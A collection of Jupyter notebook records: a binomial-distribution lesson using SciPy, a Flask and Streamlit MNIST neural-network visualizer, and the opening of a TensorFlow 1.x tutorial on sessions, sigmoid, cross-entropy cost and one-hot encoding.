*binomial expansion* of $(a+b)^n$. The numbers $\\binom{n}{k}$ are the elements of Pascal's triangle, as you will have seen in a math class.\n\nPlug in $a = p$ and $b = 1-p$ and notice that the terms in the sum are exactly the binomial probabilities we defined above. So the sum of the probabilities is\n\n$$\n\\sum_{k=0}^n \\binom{n}{k} p^k (1-p)^{n-k}\n~ = ~ \\big{(} p + (1-p) \\big{)}^n ~ = ~ 1^n ~ = ~ 1\n$$", "_____no_output_____" ], [ "### Binomial Probabilities in Python ###\n`SciPy` is a system for scientific computing, based on Python. The `stats` submodule of `scipy` does numerous calculations in probability and statistics. We will be importing it at the start of every notebook from now on.", "_____no_output_____" ] ], [ [ "from scipy import stats", "_____no_output_____" ] ], [ [ "The function `stats.binom.pmf` takes three arguments: $k$, $n$, and $p$, in that order. It returns the numerical value of $P(S_n = k)$ For short, we will say that the function returns the binomial $(n, p)$ probability of $k$.\n\nThe acronym \"pmf\" stands for \"probability mass function\" which as we have noted earlier is sometimes used as another name for the distribution of a variable that has finitely many values.\n\nThe chance of 3 sixes in 7 rolls of a die is\n$\\binom{7}{3}(1/6)^3(5/6)^4$ by the binomial formula, which works out to about 8% by the calculation below.", "_____no_output_____" ] ], [ [ "stats.binom.pmf(3, 7, 1/6)", "_____no_output_____" ] ], [ [ "You can also specify an array or list of values of $k$, and `stats.binom.pmf` will return an array consisting of all their probabilities.", "_____no_output_____" ] ], [ [ "stats.binom.pmf([2, 3, 4], 7, 1/6)", "_____no_output_____" ] ], [ [ "Thus to find $P(2 \\le S_7 \\le 4)$, you can use", "_____no_output_____" ] ], [ [ "sum(stats.binom.pmf([2, 3, 4], 7, 1/6))", "_____no_output_____" ] ], [ [ "### Binomial Histograms ###\nTo visualize binomial distributions we will use the `prob140` method `Plot`, by first using `stats.binom.pmf` to calculate the binomial probabilities. The cell below plots the distribution of $S_7$ above. Notice how we start by specifying all the possible values of $S_7$ in the array `k`.", "_____no_output_____" ] ], [ [ "n = 7\np = 1/6\nk = np.arange(n+1)\nbinom_7_1_6 = stats.binom.pmf(k, n, p)\nbinom_7_1_6_dist = Table().values(k).probability(binom_7_1_6)\nPlot(binom_7_1_6_dist)", "_____no_output_____" ] ], [ [ "Not surprisingly, the graph shows that in 7 rolls of a die you are most likely to get around 1 six.\n\nThis distribution is not symmetric, as you would expect. But something interesting happens to the distribution of the number of sixes when you increase the number of rolls.", "_____no_output_____" ] ], [ [ "n = 600\np = 1/6\nk = np.arange(n+1)\nbinom_600_1_6 = stats.binom.pmf(k, n, p)\nbinom_600_1_6_dist = Table().values(k).probability(binom_600_1_6)\nPlot(binom_600_1_6_dist)", "_____no_output_____" ] ], [ [ "This distribution is close to symmetric, even though the die has only a 1/6 chance of showing a six.\n\nAlso notice that while the the *possible* values of the number of sixes range from 0 to 600, the *probable* values are in a much smaller range. The `plt.xlim` function allows us to zoom in on the probable values. The semicolon is just to prevent Python giving us a message that clutters up the graph. The `edges=True` option forces `Plot` to draw lines separating the bars; by default, it stops doing that if the number of bars is large.", "_____no_output_____" ] ], [ [ "Plot(binom_600_16_dist, edges=True)\nplt.xlim(70, 130);", "_____no_output_____" ] ], [ [ "But the binomial $(n, p)$ distribution doesn't always look bell shaped if $n$ is large.\n\nSomething quite different happens if for example your random variable is the number of successes in 600 independent trials that have probability 1/600 of success on each trial. Then the distribution of the number of successes is binomial $(600, 1/600)$, which looks like this:", "_____no_output_____" ] ], [ [ "n = 600\np = 1/600\nk = np.arange(n+1)\nbinom_600_1_600 = stats.binom.pmf(k, n, p)\nbinom_600_1_600_dist = Table().values(k).probability(binom_600_1_600)\nPlot(binom_600_1_600_dist)", "_____no_output_____" ] ], [ [ "We really can't see that at all! Let's zoom in. When we set the limits on the horizontal axis, we have to account for the bar at 0 being centered at the 0 and hence starting at -0.5.", "_____no_output_____" ] ], [ [ "Plot(binom_600_1_600_dist, edges=True)\nplt.xlim(-1, 10);", "_____no_output_____" ] ], [ [ "Now you can see that in 600 independent trials with probability 1/600 of success on each trial, you are most likely to get no successes or 1 success. There is some chance that you get 2 through 4 successes, but the chance of any number of successes greater than 4 is barely visible on the scale of the graph.\n\nClearly, the shape of the histogram is determined by both $n$ and $p$. We will study the shape carefully in an upcoming section. But first let's see some numerical examples of using the binomial distribution.", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72d585f769d74e29733f2f7b8d8937dadefee8a
1,276
ipynb
Jupyter Notebook
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
_notebooks/2021-07-28-deepl.ipynb
junhyeongpak/juniorpaak
df103508aae7de3a8d2883d6e99d2dbce7796a27
[ "Apache-2.0" ]
null
null
null
16.151899
41
0.466301
[ [ [ "# Chapter 1\n\n- toc: true \n- badges: true\n- comments: true\n- categories: [Python,Deeplearning]", "_____no_output_____" ], [ "### 1.1 신경망 연구의 역사", "_____no_output_____" ], [ "1.1.1 다층 신경망에 대한 기대와 실망", "_____no_output_____" ] ], [ [ "- (1)", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72d6d0c5f2a2179094e606d2b455ecb0b692e39
4,252
ipynb
Jupyter Notebook
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
1
2018-06-17T14:42:52.000Z
2018-06-17T14:42:52.000Z
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
null
null
null
Spectroscopy/Absorbers.ipynb
guangtunbenzhu/BGT-Cosmology
2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee
[ "MIT" ]
null
null
null
22.983784
127
0.489887
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
e72d73846d3e91747eb82847ca767df40cb1c0f9
30,244
ipynb
Jupyter Notebook
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
null
null
null
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
4
2020-09-24T01:54:32.000Z
2022-02-26T09:58:53.000Z
_notebooks/2020-10-13-Neural Network Visualizer Web app.ipynb
sharanbabu19/sharan19
98ebc1082016bf71f6cc15f0a1f5c1392bcb2c29
[ "Apache-2.0" ]
1
2020-10-01T12:12:02.000Z
2020-10-01T12:12:02.000Z
86.411429
20,448
0.821088
[ [ [ "# \"Neural Network Visualizer Streamlit App\"\n> Visualize the predictions of your intermediate neural network layers\n\n- toc: false\n- branch: master\n- badges: true\n- comments: true\n- categories: [visualization, streamlit, explainable-AI]\n- image: images/some_folder/your_image.png\n- hide: false\n- search_exclude: true", "_____no_output_____" ], [ "# Import Libraries", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt", "_____no_output_____" ] ], [ [ "# Download Data", "_____no_output_____" ] ], [ [ "(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()", "_____no_output_____" ] ], [ [ "# Plot Examples", "_____no_output_____" ] ], [ [ "plt.figure(figsize=(10, 10))\n\nfor i in range(16):\n plt.subplot(4, 4, i + 1)\n plt.imshow(x_train[i], cmap='binary')\n plt.xlabel(str(y_train[i]))\n plt.xticks([])\n plt.yticks([])\nplt.show()", "_____no_output_____" ] ], [ [ "# Normalize Data", "_____no_output_____" ] ], [ [ "x_train = np.reshape(x_train, (60000, 784))\nx_train = x_train / 255.\n\nx_test = np.reshape(x_test, (10000, 784))\nx_test = x_test / 255.", "_____no_output_____" ] ], [ [ "# Create a Neural Network Model", "_____no_output_____" ] ], [ [ "model = tf.keras.models.Sequential([\n tf.keras.layers.Dense(32, activation='sigmoid', input_shape=(784,)),\n tf.keras.layers.Dense(32, activation='sigmoid'),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "# Train the Model", "_____no_output_____" ] ], [ [ "_ = model.fit(\n x_train, y_train,\n validation_data=(x_test, y_test),\n epochs=20, batch_size=1024,\n verbose=2\n)", "Train on 60000 samples, validate on 10000 samples\nEpoch 1/20\n60000/60000 - 1s - loss: 2.1994 - accuracy: 0.3593 - val_loss: 1.9857 - val_accuracy: 0.6710\nEpoch 2/20\n60000/60000 - 0s - loss: 1.7957 - accuracy: 0.6828 - val_loss: 1.5774 - val_accuracy: 0.7260\nEpoch 3/20\n60000/60000 - 0s - loss: 1.3886 - accuracy: 0.7427 - val_loss: 1.1907 - val_accuracy: 0.7763\nEpoch 4/20\n60000/60000 - 0s - loss: 1.0471 - accuracy: 0.7973 - val_loss: 0.9006 - val_accuracy: 0.8376\nEpoch 5/20\n60000/60000 - 0s - loss: 0.8084 - accuracy: 0.8505 - val_loss: 0.7101 - val_accuracy: 0.8699\nEpoch 6/20\n60000/60000 - 0s - loss: 0.6540 - accuracy: 0.8751 - val_loss: 0.5875 - val_accuracy: 0.8869\nEpoch 7/20\n60000/60000 - 0s - loss: 0.5524 - accuracy: 0.8868 - val_loss: 0.5048 - val_accuracy: 0.8963\nEpoch 8/20\n60000/60000 - 0s - loss: 0.4820 - accuracy: 0.8960 - val_loss: 0.4462 - val_accuracy: 0.9027\nEpoch 9/20\n60000/60000 - 0s - loss: 0.4308 - accuracy: 0.9015 - val_loss: 0.4034 - val_accuracy: 0.9095\nEpoch 10/20\n60000/60000 - 0s - loss: 0.3921 - accuracy: 0.9065 - val_loss: 0.3702 - val_accuracy: 0.9132\nEpoch 11/20\n60000/60000 - 0s - loss: 0.3617 - accuracy: 0.9112 - val_loss: 0.3445 - val_accuracy: 0.9165\nEpoch 12/20\n60000/60000 - 0s - loss: 0.3370 - accuracy: 0.9163 - val_loss: 0.3224 - val_accuracy: 0.9196\nEpoch 13/20\n60000/60000 - 0s - loss: 0.3161 - accuracy: 0.9201 - val_loss: 0.3045 - val_accuracy: 0.9222\nEpoch 14/20\n60000/60000 - 0s - loss: 0.2985 - accuracy: 0.9229 - val_loss: 0.2908 - val_accuracy: 0.9255\nEpoch 15/20\n60000/60000 - 0s - loss: 0.2832 - accuracy: 0.9269 - val_loss: 0.2765 - val_accuracy: 0.9275\nEpoch 16/20\n60000/60000 - 0s - loss: 0.2697 - accuracy: 0.9294 - val_loss: 0.2664 - val_accuracy: 0.9297\nEpoch 17/20\n60000/60000 - 0s - loss: 0.2578 - accuracy: 0.9319 - val_loss: 0.2546 - val_accuracy: 0.9324\nEpoch 18/20\n60000/60000 - 0s - loss: 0.2469 - accuracy: 0.9348 - val_loss: 0.2455 - val_accuracy: 0.9350\nEpoch 19/20\n60000/60000 - 0s - loss: 0.2372 - accuracy: 0.9377 - val_loss: 0.2371 - val_accuracy: 0.9371\nEpoch 20/20\n60000/60000 - 0s - loss: 0.2283 - accuracy: 0.9393 - val_loss: 0.2289 - val_accuracy: 0.9386\n" ] ], [ [ "# Save the Model", "_____no_output_____" ] ], [ [ "model.save('model.h5')", "_____no_output_____" ] ], [ [ "## ml_server.py", "_____no_output_____" ] ], [ [ "import json\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport random\nimport string\n\nfrom flask import Flask, request\n\napp = Flask(__name__)\n\nmodel = tf.keras.models.load_model('model.h5')\nfeature_model = tf.keras.models.Model(model.inputs, [layer.output for layer in model.layers])\n\n_, (x_test, _) = tf.keras.datasets.mnist.load_data()\nx_test = x_test / 255.\n\ndef get_prediction():\n index = np.random.choice(x_test.shape[0])\n image = x_test[index,:,:]\n image_arr = np.reshape(image, (1, 784))\n return feature_model.predict(image_arr), image\n\[email protected]('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n preds, image = get_prediction()\n final_preds = [p.tolist() for p in preds]\n return json.dumps({'prediction': final_preds, 'image': image.tolist()})\n return 'Welcome to the ml server'\n\nif __name__ == '__main__':\n app.run()\n", "_____no_output_____" ] ], [ [ "## app.py", "_____no_output_____" ] ], [ [ "import requests\nimport json\nimport numpy as np\nimport streamlit as st\nimport os\nimport matplotlib.pyplot as plt\n\nURI = 'http://127.0.0.1:5000'\n\nst.title('Neural Network Visualizer')\nst.sidebar.markdown('# Input Image')\n\nif st.button('Get random predictions'):\n response = requests.post(URI, data={})\n # print(response.text)\n response = json.loads(response.text)\n preds = response.get('prediction')\n image = response.get('image')\n image = np.reshape(image, (28, 28))\n\n st.sidebar.image(image, width=150)\n\n for layer, p in enumerate(preds):\n numbers = np.squeeze(np.array(p))\n\n plt.figure(figsize=(32, 4))\n\n if layer == 2:\n row = 1\n col = 10\n else:\n row = 2\n col = 16\n\n for i, number in enumerate(numbers):\n plt.subplot(row, col, i + 1)\n plt.imshow((number * np.ones((8, 8, 3))).astype('float32'), cmap='binary')\n plt.xticks([])\n plt.yticks([])\n if layer == 2:\n plt.xlabel(str(i), fontsize=40)\n plt.subplots_adjust(wspace=0.05, hspace=0.05)\n plt.tight_layout()\n\n st.text('Layer {}'.format(layer + 1), )\n st.pyplot()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
e72d8fe3b6fdccd3242d7da11705a557b3c14f53
97,092
ipynb
Jupyter Notebook
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
4. Convolutional Neural Networks/tensorflow_deep_nn.ipynb
c-abbott/deep-learning
445f800aa0e61c717088ef0e991d4441a61d0a6a
[ "MIT" ]
null
null
null
53.347253
18,604
0.69464
[ [ [ "# TensorFlow Tutorial\n\nWelcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow: \n\n- Initialize variables\n- Start your own session\n- Train algorithms \n- Implement a Neural Network\n\nPrograming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. ", "_____no_output_____" ], [ "## <font color='darkblue'>Updates</font>\n\n#### If you were working on the notebook before this update...\n* The current notebook is version \"v3b\".\n* You can find your original work saved in the notebook with the previous version name (it may be either TensorFlow Tutorial version 3\" or \"TensorFlow Tutorial version 3a.) \n* To view the file directory, click on the \"Coursera\" icon in the top left of this notebook.\n\n#### List of updates\n* forward_propagation instruction now says 'A1' instead of 'a1' in the formula for Z2; \n and are updated to say 'A2' instead of 'Z2' in the formula for Z3.\n* create_placeholders instruction refer to the data type \"tf.float32\" instead of float.\n* in the model function, the x axis of the plot now says \"iterations (per fives)\" instead of iterations(per tens)\n* In the linear_function, comments remind students to create the variables in the order suggested by the starter code. The comments are updated to reflect this order.\n* The test of the cost function now creates the logits without passing them through a sigmoid function (since the cost function will include the sigmoid in the built-in tensorflow function).\n* In the 'model' function, the minibatch_cost is now divided by minibatch_size (instead of num_minibatches).\n* Updated print statements and 'expected output that are used to check functions, for easier visual comparison.\n", "_____no_output_____" ], [ "## 1 - Exploring the Tensorflow Library\n\nTo start, you will import the library:", "_____no_output_____" ] ], [ [ "import math\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict\n\n%matplotlib inline\nnp.random.seed(1)", "_____no_output_____" ] ], [ [ "Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. \n$$loss = \\mathcal{L}(\\hat{y}, y) = (\\hat y^{(i)} - y^{(i)})^2 \\tag{1}$$", "_____no_output_____" ] ], [ [ "y_hat = tf.constant(36, name='y_hat') # Define y_hat constant. Set to 36.\ny = tf.constant(39, name='y') # Define y. Set to 39\n\nloss = tf.Variable((y - y_hat)**2, name='loss') # Create a variable for the loss\n\ninit = tf.global_variables_initializer() # When init is run later (session.run(init)),\n # the loss variable will be initialized and ready to be computed\nwith tf.Session() as session: # Create a session and print the output\n session.run(init) # Initializes the variables\n print(session.run(loss)) # Prints the loss", "9\n" ] ], [ [ "Writing and running programs in TensorFlow has the following steps:\n\n1. Create Tensors (variables) that are not yet executed/evaluated. \n2. Write operations between those Tensors.\n3. Initialize your Tensors. \n4. Create a Session. \n5. Run the Session. This will run the operations you'd written above. \n\nTherefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value.\n\nNow let us look at an easy example. Run the cell below:", "_____no_output_____" ] ], [ [ "a = tf.constant(2)\nb = tf.constant(10)\nc = tf.multiply(a,b)\nprint(c)", "Tensor(\"Mul:0\", shape=(), dtype=int32)\n" ] ], [ [ "As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type \"int32\". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it.", "_____no_output_____" ] ], [ [ "sess = tf.Session()\nprint(sess.run(c))", "20\n" ] ], [ [ "Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. \n\nNext, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later. \nTo specify values for a placeholder, you can pass in values by using a \"feed dictionary\" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session. ", "_____no_output_____" ] ], [ [ "# Change the value of x in the feed_dict\n\nx = tf.placeholder(tf.int64, name = 'x')\nprint(sess.run(2 * x, feed_dict = {x: 3}))\nsess.close()", "6\n" ] ], [ [ "When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. \n\nHere's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph.", "_____no_output_____" ], [ "### 1.1 - Linear function\n\nLets start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. \n\n**Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):\n```python\nX = tf.constant(np.random.randn(3,1), name = \"X\")\n\n```\nYou might find the following functions helpful: \n- tf.matmul(..., ...) to do a matrix multiplication\n- tf.add(..., ...) to do an addition\n- np.random.randn(...) to initialize randomly\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: linear_function\n\ndef linear_function():\n \"\"\"\n Implements a linear function: \n Initializes X to be a random tensor of shape (3,1)\n Initializes W to be a random tensor of shape (4,3)\n Initializes b to be a random tensor of shape (4,1)\n Returns: \n result -- runs the session for Y = WX + b \n \"\"\"\n \n np.random.seed(1)\n \n \"\"\"\n Note, to ensure that the \"random\" numbers generated match the expected results,\n please create the variables in the order given in the starting code below.\n (Do not re-arrange the order).\n \"\"\"\n X = tf.constant(np.random.randn(3, 1), name = 'X')\n W = tf.constant(np.random.randn(4, 3), name = 'W')\n b = tf.constant(np.random.randn(4, 1), name = 'b')\n Y = tf.constant(np.random.randn(4, 1), name = 'Y')\n \n # Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate\n \n sess = tf.Session()\n result = sess.run(tf.add(tf.matmul(W, X), b))\n \n # close the session \n sess.close()\n\n return result", "_____no_output_____" ], [ "print( \"result = \\n\" + str(linear_function()))", "result = \n[[-2.15657382]\n [ 2.95891446]\n [-1.08926781]\n [-0.84538042]]\n" ] ], [ [ "*** Expected Output ***: \n\n```\nresult = \n[[-2.15657382]\n [ 2.95891446]\n [-1.08926781]\n [-0.84538042]]\n```", "_____no_output_____" ], [ "### 1.2 - Computing the sigmoid \nGreat! You just implemented a linear function. Tensorflow offers a variety of commonly used neural network functions like `tf.sigmoid` and `tf.softmax`. For this exercise lets compute the sigmoid function of an input. \n\nYou will do this exercise using a placeholder variable `x`. When running the session, you should use the feed dictionary to pass in the input `z`. In this exercise, you will have to (i) create a placeholder `x`, (ii) define the operations needed to compute the sigmoid using `tf.sigmoid`, and then (iii) run the session. \n\n** Exercise **: Implement the sigmoid function below. You should use the following: \n\n- `tf.placeholder(tf.float32, name = \"...\")`\n- `tf.sigmoid(...)`\n- `sess.run(..., feed_dict = {x: z})`\n\n\nNote that there are two typical ways to create and use sessions in tensorflow: \n\n**Method 1:**\n```python\nsess = tf.Session()\n# Run the variables initialization (if needed), run the operations\nresult = sess.run(..., feed_dict = {...})\nsess.close() # Close the session\n```\n**Method 2:**\n```python\nwith tf.Session() as sess: \n # run the variables initialization (if needed), run the operations\n result = sess.run(..., feed_dict = {...})\n # This takes care of closing the session for you :)\n```\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: sigmoid\n\ndef sigmoid(z):\n \"\"\"\n Computes the sigmoid of z\n \n Arguments:\n z -- input value, scalar or vector\n \n Returns: \n results -- the sigmoid of z\n \"\"\"\n \n # Create a placeholder for x. Name it 'x'.\n x = tf.placeholder(tf.float32, name = 'x')\n\n # compute sigmoid(x)\n sigmoid = tf.sigmoid(x)\n\n # Create a session, and run it. Please use the method 2 explained above. \n # You should use a feed_dict to pass z's value to x. \n with tf.Session() as sess:\n # Run session and call the output \"result\"\n result = sess.run(sigmoid, feed_dict={x:z})\n\n \n return result", "_____no_output_____" ], [ "print (\"sigmoid(0) = \" + str(sigmoid(0)))\nprint (\"sigmoid(12) = \" + str(sigmoid(12)))", "sigmoid(0) = 0.5\nsigmoid(12) = 0.999994\n" ] ], [ [ "*** Expected Output ***: \n\n<table> \n<tr> \n<td>\n**sigmoid(0)**\n</td>\n<td>\n0.5\n</td>\n</tr>\n<tr> \n<td>\n**sigmoid(12)**\n</td>\n<td>\n0.999994\n</td>\n</tr> \n\n</table> ", "_____no_output_____" ], [ "<font color='blue'>\n**To summarize, you how know how to**:\n1. Create placeholders\n2. Specify the computation graph corresponding to operations you want to compute\n3. Create the session\n4. Run the session, using a feed dictionary if necessary to specify placeholder variables' values. ", "_____no_output_____" ], [ "### 1.3 - Computing the Cost\n\nYou can also use a built-in function to compute the cost of your neural network. So instead of needing to write code to compute this as a function of $a^{[2](i)}$ and $y^{(i)}$ for i=1...m: \n$$ J = - \\frac{1}{m} \\sum_{i = 1}^m \\large ( \\small y^{(i)} \\log a^{ [2] (i)} + (1-y^{(i)})\\log (1-a^{ [2] (i)} )\\large )\\small\\tag{2}$$\n\nyou can do it in one line of code in tensorflow!\n\n**Exercise**: Implement the cross entropy loss. The function you will use is: \n\n\n- `tf.nn.sigmoid_cross_entropy_with_logits(logits = ..., labels = ...)`\n\nYour code should input `z`, compute the sigmoid (to get `a`) and then compute the cross entropy cost $J$. All this can be done using one call to `tf.nn.sigmoid_cross_entropy_with_logits`, which computes\n\n$$- \\frac{1}{m} \\sum_{i = 1}^m \\large ( \\small y^{(i)} \\log \\sigma(z^{[2](i)}) + (1-y^{(i)})\\log (1-\\sigma(z^{[2](i)})\\large )\\small\\tag{2}$$\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: cost\n\ndef cost(logits, labels):\n \"\"\"\n    Computes the cost using the sigmoid cross entropy\n    \n    Arguments:\n    logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)\n    labels -- vector of labels y (1 or 0) \n \n Note: What we've been calling \"z\" and \"y\" in this class are respectively called \"logits\" and \"labels\" \n in the TensorFlow documentation. So logits will feed into z, and labels into y. \n    \n    Returns:\n    cost -- runs the session of the cost (formula (2))\n \"\"\"\n \n # Create the placeholders for \"logits\" (z) and \"labels\" (y) (approx. 2 lines)\n z = tf.placeholder(tf.float32, name = 'z')\n y = tf.placeholder(tf.float32, name = 'y')\n \n # Use the loss function (approx. 1 line)\n cost = tf.nn.sigmoid_cross_entropy_with_logits(logits = z, labels = y)\n \n # Create a session (approx. 1 line). See method 1 above.\n sess = tf.Session()\n \n # Run the session (approx. 1 line).\n cost = sess.run(cost, feed_dict={z: logits, y: labels})\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return cost", "_____no_output_____" ], [ "logits = np.array([0.2,0.4,0.7,0.9])\n\ncost = cost(logits, np.array([0,0,1,1]))\nprint (\"cost = \" + str(cost))", "cost = [ 0.79813886 0.91301525 0.40318605 0.34115386]\n" ] ], [ [ "** Expected Output** : \n\n```\ncost = [ 0.79813886 0.91301525 0.40318605 0.34115386]\n```", "_____no_output_____" ], [ "### 1.4 - Using One Hot encodings\n\nMany times in deep learning you will have a y vector with numbers ranging from 0 to C-1, where C is the number of classes. If C is for example 4, then you might have the following y vector which you will need to convert as follows:\n\n\n<img src=\"images/onehot.png\" style=\"width:600px;height:150px;\">\n\nThis is called a \"one hot\" encoding, because in the converted representation exactly one element of each column is \"hot\" (meaning set to 1). To do this conversion in numpy, you might have to write a few lines of code. In tensorflow, you can use one line of code: \n\n- tf.one_hot(labels, depth, axis) \n\n**Exercise:** Implement the function below to take one vector of labels and the total number of classes $C$, and return the one hot encoding. Use `tf.one_hot()` to do this. ", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: one_hot_matrix\n\ndef one_hot_matrix(labels, C):\n \"\"\"\n Creates a matrix where the i-th row corresponds to the ith class number and the jth column\n corresponds to the jth training example. So if example j had a label i. Then entry (i,j) \n will be 1. \n \n Arguments:\n labels -- vector containing the labels \n C -- number of classes, the depth of the one hot dimension\n \n Returns: \n one_hot -- one hot matrix\n \"\"\"\n \n # Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)\n C = tf.constant(C, name='C')\n \n # Use tf.one_hot, be careful with the axis (approx. 1 line)\n one_hot_matrix = tf.one_hot(labels, C, axis=0)\n \n # Create the session (approx. 1 line)\n sess = tf.Session()\n \n # Run the session (approx. 1 line)\n one_hot = sess.run(one_hot_matrix)\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return one_hot", "_____no_output_____" ], [ "labels = np.array([1,2,3,0,2,1])\none_hot = one_hot_matrix(labels, C = 4)\nprint (\"one_hot = \\n\" + str(one_hot))", "one_hot = \n[[ 0. 0. 0. 1. 0. 0.]\n [ 1. 0. 0. 0. 0. 1.]\n [ 0. 1. 0. 0. 1. 0.]\n [ 0. 0. 1. 0. 0. 0.]]\n" ] ], [ [ "**Expected Output**: \n\n```\none_hot = \n[[ 0. 0. 0. 1. 0. 0.]\n [ 1. 0. 0. 0. 0. 1.]\n [ 0. 1. 0. 0. 1. 0.]\n [ 0. 0. 1. 0. 0. 0.]]\n```", "_____no_output_____" ], [ "### 1.5 - Initialize with zeros and ones\n\nNow you will learn how to initialize a vector of zeros and ones. The function you will be calling is `tf.ones()`. To initialize with zeros you could use tf.zeros() instead. These functions take in a shape and return an array of dimension shape full of zeros and ones respectively. \n\n**Exercise:** Implement the function below to take in a shape and to return an array (of the shape's dimension of ones). \n\n - tf.ones(shape)\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: ones\n\ndef ones(shape):\n \"\"\"\n Creates an array of ones of dimension shape\n \n Arguments:\n shape -- shape of the array you want to create\n \n Returns: \n ones -- array containing only ones\n \"\"\"\n \n # Create \"ones\" tensor using tf.ones(...). (approx. 1 line)\n ones = tf.ones(shape)\n \n # Create the session (approx. 1 line)\n sess = tf.Session()\n \n # Run the session to compute 'ones' (approx. 1 line)\n ones = sess.run(ones)\n \n # Close the session (approx. 1 line). See method 1 above.\n sess.close()\n \n return ones", "_____no_output_____" ], [ "print (\"ones = \" + str(ones([3])))", "ones = [ 1. 1. 1.]\n" ] ], [ [ "**Expected Output:**\n\n<table> \n <tr> \n <td>\n **ones**\n </td>\n <td>\n [ 1. 1. 1.]\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "# 2 - Building your first neural network in tensorflow\n\nIn this part of the assignment you will build a neural network using tensorflow. Remember that there are two parts to implement a tensorflow model:\n\n- Create the computation graph\n- Run the graph\n\nLet's delve into the problem you'd like to solve!\n\n### 2.0 - Problem statement: SIGNS Dataset\n\nOne afternoon, with some friends we decided 